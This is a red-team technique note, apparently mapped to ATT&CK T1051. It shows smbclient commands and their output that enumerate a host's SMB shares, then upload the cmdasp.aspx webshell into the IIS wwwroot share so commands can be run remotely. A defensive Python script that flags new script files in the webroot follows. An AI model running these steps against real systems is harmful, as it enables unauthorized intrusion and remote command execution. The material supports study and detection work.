Shared Webroot
Lateral Movement

Execution

Enumerating the victim host 10.0.0.6 for any shares:

```
smbclient -L //10.0.0.6 -U spot

WARNING: The "syslog" option is deprecated
Enter WORKGROUP\spot's password:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	CertEnroll      Disk      Active Directory Certificate Services share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	SYSVOL          Disk      Logon server share
	temp            Disk
	tools           Disk
	transcripts     Disk
	wwwroot         Disk
```
Logging in to the wwwroot share:

```
smbclient //10.0.0.6/wwwroot -U spot

WARNING: The "syslog" option is deprecated
Enter WORKGROUP\spot's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Aug 25 16:57:52 2018
  ..                                  D        0  Sat Aug 25 16:57:52 2018
  aspnet_client                       D        0  Tue Jul 31 20:11:20 2018
  iis-85.png                          A    99710  Tue Jul 31 19:35:48 2018
  iisstart.htm                        A        3  Tue Jul 31 19:38:23 2018
```
Uploading a webshell into the wwwroot share:

```
put /usr/share/webshells/aspx/cmdasp.aspx c.aspx

putting file /usr/share/webshells/aspx/cmdasp.aspx as \c.aspx (341.8 kb/s) (average 341.8 kb/s)
smb: \> ls
  .                                   D        0  Sat Aug 25 16:59:47 2018
  ..                                  D        0  Sat Aug 25 16:59:47 2018
  aspnet_client                       D        0  Tue Jul 31 20:11:20 2018
  c.aspx                              A     1400  Sat Aug 25 16:59:47 2018
  iis-85.png                          A    99710  Tue Jul 31 19:35:48 2018
  iisstart.htm                        A        3  Tue Jul 31 19:38:23 2018

		6463487 blocks of size 4096. 3032260 blocks available
```
Same as above in a picture:
The attacker can now reach the newly uploaded webshell at http://10.0.0.6/c.aspx, where IIS executes it as an ASP.NET page, and start running commands:
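A defender's counterpart to the listings above, added here as an example and not part of the original notes: it parses `smbclient` `ls` output (the format shown above) for a baseline and a later snapshot of the share and reports files that are new and carry a server-side script extension, so the `c.aspx` that appears after the upload stands out. The two listings are constructed from the output above; the extension list is an assumption about what IIS hands to a script engine.

```python
import re
from datetime import datetime

# One entry of `smbclient` `ls` output: name, attribute flags, size, mtime.
ENTRY_RE = re.compile(
    r"^\s*(?P<name>.+?)\s+(?P<attrs>[A-Z]+)\s+(?P<size>\d+)\s+"
    r"(?P<mtime>\w{3}\s+\w{3}\s+\d{1,2}\s+\d{2}:\d{2}:\d{2}\s+\d{4})\s*$"
)
# Assumed list of extensions the web server executes rather than serves as static content.
SCRIPT_EXTS = (".aspx", ".asp", ".ashx", ".asmx", ".php", ".jsp")

# Constructed from the page's listings: the share before and after the upload.
BASELINE = """\
  .                                   D        0  Sat Aug 25 16:57:52 2018
  ..                                  D        0  Sat Aug 25 16:57:52 2018
  aspnet_client                       D        0  Tue Jul 31 20:11:20 2018
  iis-85.png                          A    99710  Tue Jul 31 19:35:48 2018
  iisstart.htm                        A        3  Tue Jul 31 19:38:23 2018
"""
AFTER_UPLOAD = """\
  .                                   D        0  Sat Aug 25 16:59:47 2018
  ..                                  D        0  Sat Aug 25 16:59:47 2018
  aspnet_client                       D        0  Tue Jul 31 20:11:20 2018
  c.aspx                              A     1400  Sat Aug 25 16:59:47 2018
  iis-85.png                          A    99710  Tue Jul 31 19:35:48 2018
  iisstart.htm                        A        3  Tue Jul 31 19:38:23 2018

		6463487 blocks of size 4096. 3032260 blocks available
"""

def parse_listing(text):
    """Return {name: (attrs, size, mtime)} for each entry; skips '.', '..' and non-entry lines."""
    entries = {}
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if not m or m.group("name") in (".", ".."):
            continue
        mtime = datetime.strptime(m.group("mtime"), "%a %b %d %H:%M:%S %Y")
        entries[m.group("name")] = (m.group("attrs"), int(m.group("size")), mtime)
    return entries

def new_script_files(baseline_text, current_text):
    """Files present now but absent from the baseline whose extension is script-like."""
    base = parse_listing(baseline_text)
    hits = []
    for name, (attrs, size, mtime) in parse_listing(current_text).items():
        if "D" in attrs or name in base:
            continue  # directories and pre-existing files are not interesting here
        if name.lower().endswith(SCRIPT_EXTS):
            hits.append((name, size, mtime))
    return sorted(hits)

if __name__ == "__main__":
    for name, size, mtime in new_script_files(BASELINE, AFTER_UPLOAD):
        print(f"new script file in webroot: {name} ({size} bytes, written {mtime})")
```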

Observations

See T1108: Webshells for observations.

References

https://attack.mitre.org/wiki/Technique/T1051